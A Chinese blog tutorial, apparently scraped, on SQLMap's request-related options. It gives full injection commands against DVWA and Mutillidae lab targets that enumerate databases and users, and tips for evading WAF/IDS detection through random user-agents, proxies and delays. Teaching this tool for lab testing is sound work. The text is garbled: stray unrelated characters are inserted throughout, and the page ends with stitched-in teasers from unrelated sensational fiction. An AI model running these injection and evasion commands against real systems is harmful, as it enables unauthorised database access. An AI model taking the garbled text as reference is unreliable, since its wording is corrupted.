二十四炊林、SQLMap自動注入-(3)REQUEST類

目錄

  1. 數(shù)據(jù)段--data選項
  2. 變量分隔符選項 --param-del
  3. cookie頭選項 --cookie
  4. 選項--user-agent
  5. 選項--random-agent
  6. 檢測user-agent注入點
  7. host頭選項 --host
  8. Referer頭選項 --referer
  9. 額外的header選項 --headers
  10. 額外的header選項 --headers
  11. 基于HTTP協(xié)議的身份認證
  12. 客戶端認證選項--auth-cert/--auth-file
  13. http(s)代理
  14. http(s)代理
  15. --timeout選項
  16. --timeout選項
  17. randomize
  18. --scope選項
  19. --scope選項
  20. --skip-urlencode選項
  21. --eval選項

1姥卢、數(shù)據(jù)段--data選項

  • get / post 都適用
#sqlmap -u "http://1.1.1.1/a.php" --data="user=1&pass=2" -f //將get或post中的數(shù)據(jù)段以data傳入

首先,使用F12铛铁,調(diào)用調(diào)試器隔显,然后點擊“啟用”


設(shè)置瀏覽器抓包

首先復制抓包后的鏈接:


復制鏈接

然后將其post提交的數(shù)據(jù)已--data
選擇post數(shù)據(jù)
#sqlmap -u "http://192.168.50.183/mutillidae/index.php?page=login.php" --data "username=1&password=2&login-php-submit-button=Login" --dbs

上述是post方法,下面是將get方法進行提交饵逐、拆分

sqlmap -u "http://192.168.50.183/mutillidae/index.php" --data="page=user-info.php&username=1&password=1&user-info-php-submit-button=View+Account+Details" -p username --users

2、變量分隔符選項 --param-del

sqlmap -u "http://1.1.1.1/a.php" --data="q=foo;id=1" --param-del=";" -f
用分號彪标;作為分隔符倍权,之前是使用&

3、cookie頭選項 --cookie

  • 使用cookie作為登錄標識捞烟,即需要先正常登錄后薄声,在進行相關(guān)的訪問的,在探測時需要使用--cookie:
  • web應用需要機遇cookie的身份認證
  • 檢查cookie中的注入點(sqlmap自動測試题画,cookie字段中的變量存在的注入點檢測默辨,在設(shè)置level≥2的時候)
  • Set-Cookie / --drop-set-cookie(當服務器響應新的cookie時,不更新苍息,仍使用原有cookie) / --cookie-del

訪問dvwa的的盲注頁面:


dvwa盲注頁面

復制cookie數(shù)據(jù):

cookie信息

使用sqlmap進行sql探測

#sqlmap -u "http://192.168.1.183/dvwa/vulnerabilities/sqli_blind/?id=2&Submit=Submit#" --cookie="security=low;PHPSESSID=db6d77a898092583a30086fd7a6c1823" --dbs
//在登錄后需要使用cookie認證的探測
 #sqlmap -u "http://192.168.1.183/dvwa/vulnerabilities/sqli_blind/?id=2&Submit=Submit#" --cookie="security=low;PHPSESSID=db6d77a898092583a30086fd7a6c1823" --level2 --dbs
//設(shè)置level為2缩幸,最大值可設(shè)置為5,還可以繼續(xù)探測到cookie中變量是否存在注入

4竞思、選項--user-agent

sqlmap在發(fā)送掃描探測的時候表谊,默認使用的user-agent為sqlmap/1.0-xxxx(http://sqlmap.org)的字符串。

通過wireshark查看默認下sqlmap的user-agent隙咸,首先仍使用上述sqlmap語句進行探測检痰,同時打開wireshark争群,過濾為目標IP地址,并觀察tcpstream流


sqlmap探測
查看tcp流

sqlmap默認的useragent

可以通過使用--user-agent=“xxx”進行修改距辆,也可以通過下面的--random-agent修改

5余佃、選項--random-agent

/usr/share/sqlmap/txt/user-agents.txt中,有已經(jīng)寫好的user-agent跨算,可以使用--random-agent在其txt中隨機使用一個作為user-agent爆土。

#sqlmap -u "http://192.168.1.183/dvwa/vulnerabilities/sqli_blind/?id=2&Submit=Submit#" --cookie="security=low;PHPSESSID=db6d77a898092583a30086fd7a6c1823" --dbs --random-agent

使用wireshark抓包,查看tcp流漂彤,選取了txt中的firefox作為useragent


--random-agent修改useragent

6雾消、檢測user-agent注入點

sqlmap檢查user-agent中的注入點:level≥3
APP/WAF/IPS/IDS過濾異常user-agent時,如果有如下報錯挫望,是因為useragent被服務端識別立润,下面報錯中提示sqlmap使用--random-agent產(chǎn)生user-agent:

[hh:mm:20] [ERROR] the target URL responded with an unknown HTTP status code, try to force the HTTP User-Agent header with option --useragent or --random-agent

7、host頭選項 --host

設(shè)置level≥5媳板,即最高級別才會檢查host頭是否存在注入

--host="xxxx"

8桑腮、Referer頭選項 --referer

lever≥3

--referer="xxx"

9、額外的header選項 --headers

設(shè)置header中的屬性信息蛉幸,改為自己想要發(fā)送的header

sqlmap -u "http://192.168.50.183/dvwa/vulnerabilities/sqli_blind/?id=2&Submit=Submit#" --cookie="security=low; PHPSESSID=d9994fc98d59c687c8b7af790bd56da2" --dbs --headers="Host:www.aaa.com\nUser-Agent:bbbbb"
// \n表示換行符破讨,每個頭使用單獨的一行,因此需要\n

通過wireshark可以查看修改后的Host和User-Agent

wireshark抓包

10奕纫、選項 --method=POST/GET

--method=POST/GET    //使用GET或者POST方法探測

11提陶、基于HTTP協(xié)議的身份認證

  • HTTP
  • Basic
  • Digest
  • NTLM
# sqlmap. -u "http://1.1.1.1/a.php?id=1" --auth-type Basic --auth-cred
"user:pass“   //--auth-tyep指定認證類型,user:pass表示用戶名和密碼

12匹层、客戶端認證選項--auth-cert/--auth-file

關(guān)于證書隙笆,除了認證服務端之外,服務端也認證客戶端這種雙向認證的場景

--auth-file="ca.PEM"
  • 僅支持含有私鑰的PEM格式證書文件
  • 或者是PEM格式的證書鏈文件

13升筏、http(s)代理

在sqlmap進行探測的過程中撑柔,為避免被服務端發(fā)現(xiàn)、對IP地址進行限制您访,可以采取使用代理的方式探測

--proxy="http://127.0.0.1:8080"
--proxy-cred="name:pass" //訪問搭理需要用戶名铅忿、密碼的情況下加上此選項
--ignore-proxy  //忽略系統(tǒng)級代理設(shè)置(一般的代理是通過瀏覽器代理),通常用于掃描本地網(wǎng)絡(luò)目標

14灵汪、--delay選項

每次http(s)請求之間延遲時間檀训,單位為秒,可以是浮點數(shù)识虚,如1.5s也可以肢扯,默認無延遲。此項避免服務端發(fā)現(xiàn)注入攻擊担锤,每個一段時間發(fā)送探測蔚晨。

15、--timeout選項

請求超時時間,浮點數(shù)铭腕,默認為30s银择,在多長時間沒有接收到服務器的響應時間

16、--retries選項

http(s)連接超時重試次數(shù)累舷,默認3次浩考,連續(xù)超過3個timeout即不在發(fā)送請求。

17被盈、randomize

長度析孽、類型與原始值保持一致的前提下,指定每次請求隨機取值的參數(shù)名

#sqlmap -u "http://1.1.1.1/a.php?id=100 --randomize="id"
//每次id的值從100到999只怎,id為的長度等保持不變

18袜瞬、 --scope選項

過濾日志內(nèi)容,通過政治表達式篩選掃描對象

sqlmap -l burp.log --scope="(www)?\.target\.(com|net|org)"
sqlmap -l 2.log --scope="(19)?\.168\.20\.(1|10|100)"  --level 3 --dbs

19身堡、--safe-url / --safe-freq選項

  • 檢測和盲注階段會產(chǎn)生大量失敗請求邓尤,服務器端可能因此銷毀session
  • 每發(fā)送--safe-freq次注入請求后,發(fā)送一次正常請求
--safe-url  // 每次需要探測的url地址
--safe-freq  //頻次贴谎,每次多少次請求后汞扎,發(fā)送正常請求

20、--skip-urlencode選項

默認Get方法會對傳輸內(nèi)容進行編碼擅这,某些web服務器不遵守RFC編碼標準澈魄,使用原始字符提交數(shù)據(jù)
直接在命令行后添加選項 --skip-urlencode

21、--eval選項

每次請求前執(zhí)行指定的python代碼
每次請求更改或增加新的參數(shù)值(時間依賴仲翎、其他參數(shù)數(shù)值依賴)

#sqlmap -u "http://1.1.1.1/a.php?
id=1&hash=c4ca4238a0b923820dcc509a6f75849b" --eval="import
hashlib;hash=hashlib.md5(id).hexdigest()"
//hash值依賴于前面的id信息一忱,每次id變化的話,hash也要隨之變化谭确,此時需要--eval選項,通過python腳本實現(xiàn)每次id和對應的hash一致
最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末票渠,一起剝皮案震驚了整個濱河市逐哈,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌昂秃,老刑警劉巖,帶你破解...
    沈念sama閱讀 206,723評論 6 481
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件肠骆,死亡現(xiàn)場離奇詭異,居然都是意外死亡塞耕,警方通過查閱死者的電腦和手機,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 88,485評論 2 382
  • 文/潘曉璐 我一進店門莉钙,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人磁玉,你說我怎么就攤上這事停忿。” “怎么了蚊伞?”我有些...
    開封第一講書人閱讀 152,998評論 0 344
  • 文/不壞的土叔 我叫張陵席赂,是天一觀的道長。 經(jīng)常有香客問我时迫,道長颅停,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 55,323評論 1 279
  • 正文 為了忘掉前任别垮,我火速辦了婚禮便监,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘碳想。我一直安慰自己烧董,他們只是感情好,可當我...
    茶點故事閱讀 64,355評論 5 374
  • 文/花漫 我一把揭開白布胧奔。 她就那樣靜靜地躺著逊移,像睡著了一般。 火紅的嫁衣襯著肌膚如雪龙填。 梳的紋絲不亂的頭發(fā)上胳泉,一...
    開封第一講書人閱讀 49,079評論 1 285
  • 那天,我揣著相機與錄音岩遗,去河邊找鬼扇商。 笑死,一個胖子當著我的面吹牛宿礁,可吹牛的內(nèi)容都是我干的案铺。 我是一名探鬼主播,決...
    沈念sama閱讀 38,389評論 3 400
  • 文/蒼蘭香墨 我猛地睜開眼梆靖,長吁一口氣:“原來是場噩夢啊……” “哼控汉!你這毒婦竟也來了?” 一聲冷哼從身側(cè)響起返吻,我...
    開封第一講書人閱讀 37,019評論 0 259
  • 序言:老撾萬榮一對情侶失蹤姑子,失蹤者是張志新(化名)和其女友劉穎,沒想到半個月后测僵,有當?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體街佑,經(jīng)...
    沈念sama閱讀 43,519評論 1 300
  • 正文 獨居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 35,971評論 2 325
  • 正文 我和宋清朗相戀三年,在試婚紗的時候發(fā)現(xiàn)自己被綠了舆乔。 大學時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片岳服。...
    茶點故事閱讀 38,100評論 1 333
  • 序言:一個原本活蹦亂跳的男人離奇死亡,死狀恐怖希俩,靈堂內(nèi)的尸體忽然破棺而出吊宋,到底是詐尸還是另有隱情,我是刑警寧澤颜武,帶...
    沈念sama閱讀 33,738評論 4 324
  • 正文 年R本政府宣布,位于F島的核電站鳞上,受9級特大地震影響,放射性物質(zhì)發(fā)生泄漏唾糯。R本人自食惡果不足惜鬼贱,卻給世界環(huán)境...
    茶點故事閱讀 39,293評論 3 307
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望舟误。 院中可真熱鬧姻乓,春花似錦、人聲如沸赖草。這莊子的主人今日做“春日...
    開封第一講書人閱讀 30,289評論 0 19
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽如暖。三九已至忌堂,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背樱衷。 一陣腳步聲響...
    開封第一講書人閱讀 31,517評論 1 262
  • 我被黑心中介騙來泰國打工矩桂, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留痪伦,地道東北人。 一個月前我還...
    沈念sama閱讀 45,547評論 2 354
  • 正文 我出身青樓癞蚕,卻偏偏與公主長得像桦山,于是被迫代替她去往敵國和親。 傳聞我的和親對象是個殘疾皇子恒水,可洞房花燭夜當晚...
    茶點故事閱讀 42,834評論 2 345

推薦閱讀更多精彩內(nèi)容

  • http://192.168.136.131/sqlmap/mysql/get_int.php?id=1 當給sq...
    xuningbo閱讀 10,258評論 2 22
  • sqlmap用戶手冊 說明:本文為轉(zhuǎn)載,對原文中一些明顯的拼寫錯誤進行修正箩张,并標注對自己有用的信息。 ======...
    wind_飄閱讀 2,033評論 0 5
  • sqlmap也是滲透中常用的一個注入工具饮笛,其實在注入工具方面论熙,一個sqlmap就足夠用了,只要你用的熟无午,秒殺各種工...
    linkally閱讀 6,863評論 1 40
  • SQLMAP作用 判斷可注入的參數(shù) 判斷可以用哪種SQL注入技術(shù)來注入 識別出哪種數(shù)據(jù)庫 根據(jù)用戶選擇宪迟,讀取哪些數(shù)...
    陸灑脫閱讀 3,711評論 1 4
  • sqlmap也是滲透中常用的一個注入工具次泽,其實在注入工具方面穿仪,一個sqlmap就足夠用了啊片,只要你用的熟玖像,秒殺各種工...
    查無此人asdasd閱讀 1,529評論 0 1